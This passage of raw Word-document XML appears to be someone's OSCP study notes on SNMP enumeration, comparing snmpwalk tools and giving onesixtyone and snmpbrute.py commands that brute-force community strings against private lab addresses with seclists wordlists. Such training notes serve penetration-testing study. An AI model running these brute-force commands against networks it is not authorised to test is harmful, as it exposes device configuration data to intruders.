    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003074">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1441"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpbulkwalk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003075">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1441"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Much </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FASTER </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">than </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. It seems to get around the same amount of info as snmpwalk as well. But it's fastest in SNMP version 2/3 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003076">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1441"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dumps ALL the MIBs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003077">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1441"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Much more info than snmp-check</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003078">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1441"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003079">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1441"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Default in autorecon</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but as shown in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1080">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mentor</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTB, it is MUCH slower than snmpbulkwalk (like 2 minutes vs. 12 minutes slower in the HTB video)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000307A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000307B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8fwml49emxm7" w:id="431"/>
      <w:bookmarkEnd w:id="431"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">onesixtyone</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000307C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This tool is used by Autorecon, and it bruteforces the community strings </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000307D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000307E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt 192.168.118.149  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000307F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="206"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one just shows the ones that succeeded </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003080">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003081">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt -dd 192.168.216.149 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003082">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="477"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VERY verbose since it displays every single line whether it fails or not since -dd stands for debug</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003083">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1739900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="522" name="image504.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image504.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId108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3084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1090"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, while this one lone line is far away from the "public" string attempt, it's because onesixtyone doesn't wait for response</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003085">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1090"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To find out which community string this long output belongs to, look at the first highlight, which says</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> [public]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, meaning it's part of the public community</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003086">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1090"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And if you look at this output, the public string output shows up multiple times, because in the wordlist it contains strings like public, PUBLIC, Public, and such</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003087">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003088">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—-------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003089">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_55k3npju58sx" w:id="432"/>
      <w:bookmarkEnd w:id="432"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmp-brute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000308A">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It uses metasploit so that counts as a metasploit usage on OSCP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000308B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000308C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1082">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mentor</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTB (in the 20:00 minute mark), they ran snmp-brute and found a community string other than "public".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000308D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000308E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then they ran onesixtyone and it only found public. So, I think it's best to do BOTH onesixtyone and snmp-brute. Also, snmp-brute also tells version numbers which I like</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000308F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003090">
      <w:pPr>
        <w:ind w:left="-1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7672388" cy="3725534"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="209" name="image207.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image207.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1083"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7672388" cy="3725534"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003091">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003092">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003093">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003094">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003095">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 snmpbrute.py -t &lt;IP&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1362"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uses default wordlist built into the python code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003097">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003098">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 snmpbrute.py -t &lt;IP&gt; -f /usr/share/seclists/Discovery/SNMP/snmp.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003099">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uses snmp.txt seclists wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000309A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000309B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Seclists wordlists for SNMP found in:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000309C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="981"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/seclists/Discovery/SNMP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000309D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="981"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There are 4 wordlists</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000309E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="981"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They used "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">common-snmp-community-strings.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" in the video</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000309F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="981"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
